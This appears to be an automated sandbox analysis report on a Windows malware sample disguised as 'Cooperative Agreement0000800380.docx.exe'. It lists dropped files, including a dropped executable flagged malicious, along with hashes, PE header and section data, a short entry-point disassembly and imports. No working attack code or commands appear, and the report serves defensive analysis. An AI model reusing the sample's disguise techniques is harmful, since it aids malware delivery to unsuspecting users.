                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):8652434
                                                                                                                                                                                                                                      Entropy (8bit):7.994002792255621
                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                      SSDEEP:196608:8mgqwfI9jUC2gYBYv3vbW4SEAGPFQw6+HlmQEh:c5IH2gYBgDWZwQwhlk
                                                                                                                                                                                                                                      MD5:78F52BE4313947325B63CDB27B35C6DC
                                                                                                                                                                                                                                      SHA1:0ED98A727EC8F04C1C61C75F5E18A794217BDCC1
                                                                                                                                                                                                                                      SHA-256:C9812C059C0165BE0009EAFEB17315256FCF8CA39628EB1646565FF6C4C9FB6C
                                                                                                                                                                                                                                      SHA-512:8962F32E9FDBC244103521B454DFBADA9259C7754C3CD125C11B582E5B952C3E023CC7E73244A793F1CEE1D871D6459F3DEC55776B50182318BBCB9866EE00CD
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d...vvLg.........."....)............ ..........@..........................................`.................................................4...x....p..D2...@..8"..J..H$......d...................................@...@............................................text...p........................... ..`.rdata..(*.......,..................@..@.data....S..........................@....pdata..8"...@...$..................@..@.rsrc...D2...p...4..................@..@.reloc..d............6..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1470x1960, components 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):51099
                                                                                                                                                                                                                                      Entropy (8bit):7.670290194327737
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:GoDSCUA0UzmsiIrcggwz62FVRy9p/KklK+/h/C:GoDStWHrB6ooBVl7c
                                                                                                                                                                                                                                      MD5:08DF323C85C73E9D39756ED2344BC05A
                                                                                                                                                                                                                                      SHA1:D733C4728E0B0930C3E084843B06AAA9709D96CF
                                                                                                                                                                                                                                      SHA-256:72A3158EB1B436B4F273309BEB1F85FE3C48AA9686B82D28F43EB32B328E8BA9
                                                                                                                                                                                                                                      SHA-512:6A2ADFB781A0434A45095ED55D5E0FBD4BA49D900B1198EE96984787D6AE7C229F362FBDE206D9EAF632A78899C908C8E34623066F8AF73CFDC26747E55876EA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:......JFIF.....H.H.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................!......................!1a.A..Q..................................................!.1............?......... .....k>...L.n~.1}...L.NW.7..3....A.b..=.._........v.g........p...GYZ.r.(...cR.(........................(...*............a........".....`. `...(...&... .(A0...L.0....P.P.1p...1@L1@A@AO.A@C..PP...0P.P...1p...0........L.........1A.....C.......TP....@@g.u..>....oO.... ..6.... .R......\.....}:z.^....X...,....0WI...F.....Nq...MJ.X.........+..K....r.....2........ . .............."....@AP.P.P.P.T..AP....P.P..............P..(.. ..a.........(.*...........(`.(....( .............(..(....D.(........`. ..4."..i(9{..>....9z. ..........q(1....v..........b....b.z....yx.N..S.^~....Y..g.....9k.Y.yA.F.t.yQ..^VEE.D.. 5...[..@........WMgN...4...A.Mf.kMgM.....hcM..cN.......4.....D.P]
                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):55
                                                                                                                                                                                                                                      Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                      Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):97
                                                                                                                                                                                                                                      Entropy (8bit):4.331807756485642
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                                                                                      MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                                                                                      SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                                                                                      SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                                                                                      SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...
                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Entropy (8bit):6.913045032384303
                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                                                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                      • VXD Driver (31/22) 0.00%
                                                                                                                                                                                                                                      File name:Cooperative Agreement0000800380.docx.exe
                                                                                                                                                                                                                                      File size:100'864 bytes
                                                                                                                                                                                                                                      MD5:24ffda8b313b8867568168889eda370f
                                                                                                                                                                                                                                      SHA1:dbdc131878ae66320104bcd33cc32021df45eb72
                                                                                                                                                                                                                                      SHA256:759a3f120cd0280ec88cbd5ad614eeffb89d3a0cf65421f6bf7faf787a7dc282
                                                                                                                                                                                                                                      SHA512:bbc6f4f7a9af163b1299119e9e332f24c164efa7f98591e7425bbd33d47a26b99a3b06038504944a28c10edeaf8fd27614d0ea68f2913f51204edd2fe09d86f9
                                                                                                                                                                                                                                      SSDEEP:1536:D7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIfnxoVAmHLjHnXpnOK:fq6+ouCpk2mpcWJ0r+QNTBfnULHH3pl
                                                                                                                                                                                                                                      TLSH:F8A38D45F2E242F7E9E10A7100A6722F973A76249724E8DBC34C3D839553AD59A3C3E9
                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b.@]...............2.....z...............0....@........................................................................
                                                                                                                                                                                                                                      Icon Hash:33e1a1a4a6a4818b
                                                                                                                                                                                                                                      Entrypoint:0x401000
                                                                                                                                                                                                                                      Entrypoint Section:.code
                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                                                      DLL Characteristics:
                                                                                                                                                                                                                                      Time Stamp:0x5D400562 [Tue Jul 30 08:52:50 2019 UTC]
                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                      OS Version Major:4
                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                      File Version Major:4
                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                      Import Hash:5877688b4859ffd051f6be3b8e0cd533
                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                      push 000000ACh
                                                                                                                                                                                                                                      push 00000000h
                                                                                                                                                                                                                                      push 00418010h
                                                                                                                                                                                                                                      call 00007F1BB8C75441h
                                                                                                                                                                                                                                      add esp, 0Ch
                                                                                                                                                                                                                                      push 00000000h
                                                                                                                                                                                                                                      call 00007F1BB8C7543Ah
                                                                                                                                                                                                                                      mov dword ptr [00418014h], eax
                                                                                                                                                                                                                                      push 00000000h
                                                                                                                                                                                                                                      push 00001000h
                                                                                                                                                                                                                                      push 00000000h
                                                                                                                                                                                                                                      call 00007F1BB8C75427h
                                                                                                                                                                                                                                      mov dword ptr [00418010h], eax
                                                                                                                                                                                                                                      call 00007F1BB8C753A1h
                                                                                                                                                                                                                                      mov eax, 00417088h
                                                                                                                                                                                                                                      mov dword ptr [00418034h], eax
                                                                                                                                                                                                                                      call 00007F1BB8C7E1C2h
                                                                                                                                                                                                                                      call 00007F1BB8C7DF2Eh
                                                                                                                                                                                                                                      call 00007F1BB8C7AE28h
                                                                                                                                                                                                                                      call 00007F1BB8C7A6ACh
                                                                                                                                                                                                                                      call 00007F1BB8C7A13Fh
                                                                                                                                                                                                                                      call 00007F1BB8C79EB9h
                                                                                                                                                                                                                                      call 00007F1BB8C799DDh
                                                                                                                                                                                                                                      call 00007F1BB8C7915Dh
                                                                                                                                                                                                                                      call 00007F1BB8C75725h
                                                                                                                                                                                                                                      call 00007F1BB8C7CAA8h
                                                                                                                                                                                                                                      call 00007F1BB8C7B550h
                                                                                                                                                                                                                                      mov edx, 0041702Eh
                                                                                                                                                                                                                                      lea ecx, dword ptr [0041801Ch]
                                                                                                                                                                                                                                      call 00007F1BB8C753B8h
                                                                                                                                                                                                                                      push FFFFFFF5h
                                                                                                                                                                                                                                      call 00007F1BB8C753C8h
                                                                                                                                                                                                                                      mov dword ptr [0041803Ch], eax
                                                                                                                                                                                                                                      mov eax, 00000200h
                                                                                                                                                                                                                                      push eax
                                                                                                                                                                                                                                      lea eax, dword ptr [004180B8h]
                                                                                                                                                                                                                                      push eax
                                                                                                                                                                                                                                      xor eax, eax
                                                                                                                                                                                                                                      push eax
                                                                                                                                                                                                                                      push 00000015h
                                                                                                                                                                                                                                      push 00000004h
                                                                                                                                                                                                                                      call 00007F1BB8C7A102h
                                                                                                                                                                                                                                      push dword ptr [004180A0h]
                                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1717c0xc8.data
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x190000x329c.rsrc
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x174700x22c.data
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                      .code0x10000x37f00x38006c0f4094a5493360ae8c9032ef3a9f47False0.47140066964285715data5.608776130769213IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                      .text0x50000xd2c20xd4001da643e4b1937b50550f9d9e8250428eFalse0.5114239386792453data6.558083729279072IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                      .rdata0x130000x339d0x34004fb07923b0eb72c40319d48fd2d4f13fFalse0.8046123798076923data7.110640338733979IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                      .data0x170000x172c0x1200b04166e46a18d11ceb7c9e93bc590cd2False0.3940972222222222data4.997217661149305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                      .rsrc0x190000x329c0x3400b64dbe8885505d72259e11678a6a095eFalse0.9015925480769231data7.812830291800238IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                      RT_ICON0x192ac0x1f2dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9535145971682747
                                                                                                                                                                                                                                      RT_RCDATA0x1b1dc0xezlib compressed data1.5714285714285714
                                                                                                                                                                                                                                      RT_RCDATA0x1b1ec0xcdata1.6666666666666667
                                                                                                                                                                                                                                      RT_RCDATA0x1b1f80xe25data1.0030378348522508
                                                                                                                                                                                                                                      RT_RCDATA0x1c0200x1very short file (no magic)9.0
                                                                                                                                                                                                                                      RT_GROUP_ICON0x1c0240x14data1.05
                                                                                                                                                                                                                                      RT_MANIFEST0x1c0380x263XML 1.0 document, ASCII text0.5319148936170213
                                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                                      MSVCRT.dllmemset, wcsncmp, memmove, wcsncpy, wcsstr, _wcsnicmp, _wcsdup, free, _wcsicmp, wcslen, wcscpy, wcscmp, memcpy, tolower, wcscat, malloc
